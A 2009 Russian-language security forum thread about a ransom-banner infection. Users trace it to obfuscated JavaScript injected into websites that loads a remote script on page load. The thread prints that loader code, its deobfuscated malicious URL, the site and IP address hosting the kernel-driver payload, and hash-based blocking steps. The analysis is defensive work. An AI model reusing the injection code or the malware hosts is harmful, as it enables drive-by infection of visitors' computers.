-
Junior Member
- Вес репутации
- 53
ПО File Downloader доступ в сеть запрещен
Здравствуйте !!!
На скрине видно, сегодня при попытке скачать торрент-файлик вот такая бяка встала на рабочем столе, и кстати блокировалла соединение с интернет, а именно DSL-Router DSL 2520U с компьтером.
Мне помогло восстановление системы Виндовс ХП Хоме-эдишн лицензия, откатился на 13 декабря и баннер исчез.
Что мне надо сделать чтоб окончательно удалить всякую бяку после этого баннера? Антивирусов в системе нет, был Касперский лицензия но в начале декабря лицензия кончилась, а продлевать нет смысла от этого каспера.
На данный момент комп не тормозит, программы нормально запускаются, пишу с этого-же компа.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Вам поговорить или решить проблему?
-
-
Junior Member
- Вес репутации
- 53
Да вобщем проблема решена, но есть другая на почту не пришло письмо активации аккаунта, через "обратную связь" написал а в ответ тишина, личные данные нельзя редактировать.
-
Тогда переедем. Пока сюда, дальше администрация решит, куда лучше.
-
-
Junior Member
- Вес репутации
- 53
Ну вот и письмо дошло; Отправлено 14 декабря 2009 в 16:15, получено в 21:25
-
Junior Member
- Вес репутации
- 59
-
Junior Member
- Вес репутации
- 59
Ну полный фишиш. Еще почитал логи и нашел очень интересный сайт.
ВНИМАНИЕ!!! Не заходите на нижеуказанный сайт ни при каких обстоятельствах с использованием IE и Firefox, это может принести вред вашему компьютеру.
=================
h_t_t_p://ridjey.ru
=================
Если зайти на этот сайт будет установлен вирус без каких-либо предупреждений, уведомлений и предложений, он просто будет установлен и нарушит нормальную работу Win.
Посмотрев контент нашел вот что:
Код:
*GNU GPL*/
try{window.onload = function()
{
var D6rxya3l44pnunx = document.createElement('script');
D6rxya3l44pnunx.setAttribute('type', 'text/javascript');
D6rxya3l44pnunx.setAttribute('id', 'myscript1');
D6rxya3l44pnunx.setAttribute('src', '
========Указаный ниже блок кода пишется в одну строку=====
h#$t(&$!t(!p(:&)/#&/(g#(@o$#@o#g(l^&^$$e!(-&c#!(o!m@-$&^d^@!o!((@).
(^i!#()n)!s##!i@!(^g#h&)@&t#e&#x#&)^p#)r&!$e&^!s###&s$!a!))i@(#).
!#c@$o$@!m(.($$d&^)t#)$)(i@$(b@!^#l&&$o&!g!@-&(^#c#(&o##&m$!)#.
#g#!^r#!e)$^#a^@#)t)$(^s)()a)l^$e)c^!&e#!^n$)t(#e^r$$&).)(!$$r^@u):
(&^8@)0$@)8$0$)/!##g&!(s@#m#a@r$(e)^n!@a@.#)c@o)^m##^/&#@g^$s@)#$m^#a$&r&!&e(&$n(&^a!)#^.
&c)o@#&m(/#$#$m@($!&e$!#t&^!r)!^@o)$l##y&#(r!^^i@#@!c(s$)^$).$!(c(o^^&#m)!^$/)!&q)
@$i!&&d&^(#)i^a^&@n#.!^@c($$o#@@m$!/(^g^o!&^(o!&(^@g()l^#&e((!!.@!c&$)o))
(#^m#/$'.replace(/\$|\^|\)|&|\(|\!|#|@/ig, ''));
======================================================
D6rxya3l44pnunx.setAttribute('defer', 'defer');
document.body.appendChild(D6rxya3l44pnunx);
}
}
catch(e) {}
Видимо вот это JavaScript-животное и цепляет заразу без спроса (хотя за достоверность не ручаюсь, дебаг не делал).
Как возможный вариант источника заразы - подхват контента с баннерных систем. Например в HTML-коде указанного выше сайта я нашел подгрузку файлика "autocontext2.js" с autocontext.begun.ru. Этот скрипт генерирует контекстную рекламу на сайте и теоретически если запулить на бегун баннер хитрого содержания можно заставить браузер выполнить произвольный код. Если такое возможно, то под угрозой очень большое количество пользователей.
Добавлено через 27 минут
Кажется нашел основной файл вируса. Называется он applicationdata.bin и расположен по адресу 208.101.27.44/applicationdata.bin. Имеет размер 698041 байт и представляет из себя драйвер KernelMode который в систему устаналивается как сервис под именем bcebq и хранится этот драйвер по адресу c:\windows\system32\bcebq.sys Этот драйвер невозможно выгрузить или удалить. Для удаления мне пришлось загрузить консоль восстановления и удалить файлик из коммандной строки. Сложность удаления из под работающей винды в том, что при вызове контекстного меню "свойства" для этого файла не удается увидеть вкладку разрешения (хотел просто запретить для системы чтение этого файла), тоже самое касается ключа реестра для этого драйвера, контекстное меню разрешений открывает пустое окно с надписью "Ошибка доступа к информации о безопасности".
Этот драйвер похоже сильно хозяйничает в ядре операционной системе если может сделать такое.
Последний раз редактировалось fksm; 18.12.2009 в 13:41.
Причина: Добавлено
-
to fksm:
А если изменить натройки безопасности IE со стандартных на нормальные, то автоматическая установка этого "ПО" возможна?
-
Junior Member
- Вес репутации
- 59
Если честно не пробовал, но наверное возможно. Я сейчас посмотрел настройки по-умолчанию и для JavaScript там все разрешено без спросу, но есть варианты "запретить" и "предложить". Думаю если поставить хотя бы вариант "Предложить" так просто гадость не прицепится. Но с другой стороны не известно как будут на такой уровень безопасности реагировать другие обычные сайты. Например тот-же гугл со своим Ajax-ом в строке поиска может либо не запуститься, либо замучает вопросами "можно/нельзя". Надо попробовать.
-
Вообще-то, обычно подобные вещи (Windows Заблокирован, Digital Access, Ufast и т.п.) бывают на видеосайтах, обычно такие сайты не имеют URL (только IP).
-
Junior Member
- Вес репутации
- 53
Сообщение от
fksm
Видимо вот это JavaScript-животное и цепляет заразу без спроса
Точно вспомнил, перед тем как загрузить торрент-файлик этот JavaScript устанавливался у меня на IE-8 без какого либо запроса.
-
Junior Member
- Вес репутации
- 59
А вот и подтверждение: http://virusinfo.info/showthread.php?t=64189
Поиск в гугле по слову Hva23p3hnyirlpv7 (это слово взято из прицепленного вирусом кода) выдает 434 узла, и все они заражены. Довольно продвинутый способ распространения заразы, я такого еще не встречал.
Итак что делать чтобы описанный вирус не запустился?
1. Делаем пуск - выполнить, пишем mmc жмем ок
2. В открывшейся консоли жмем "Консоль - добавить или удалить оснастку..."
3. В диалоговом окне жмем кнопку "Добавить" и добавляем оснастку "Редактор групповой политики".
4. Переходим по дереву Конфигурация компьютера - Конфигурация Windows - Параметры безопасности - Политики ограниченного использования программ.
5. При первом входе в этот элемент нужно создать новые политики используя пункт меню "Действие".
6. Далее заходим в "дополнительные правила" и нажав вправом окне правой кнопкой мыши "создать правила для хеша" вводим данные о блокируемом файле:
а) поле хешируемый файл задается в значение af479a1a09db648b9445a0c8c0756c05:697856:32771
б) поле информация файла здается в значение applicationdata.bin, 682 КБ
в) безопасность - не разрешено
Аналогичным образом блокируем второй файл:
а) 1d6596b0b9011c24163b4136be189a27:15360:32771
б) ~TM2FF.tmp, 16 КБ
в) не разрешно
Дальше можно закрыть mmc, на предложение сохранить консоль можно нажать нет, этот ответ не повлияет на сделанные операции, т.к. они применяются сразу же после ввода данных, а сохранение консоли всего лишь сохраняет набор созданных оснасток.
Последний раз редактировалось fksm; 19.12.2009 в 21:06.
-
Junior Member
- Вес репутации
- 60
Сообщение от
fksm
.replace(/\$|\^|\)|&|\(|\!|#|@/ig, '')
если в указанном выше куске кода выполнить этот replace
то получиться примерно следующее
_http://mybrowserbar-com.samsung.com.nasa-gov.egreatsale.ru:8080/megavideo.com/megavideo.com/laredoute.fr/bild.de/google.com
вот туда он или чета качает или куда дальше отправляет.
кстати НОД сразу ахтунг объявляет на этот адрес.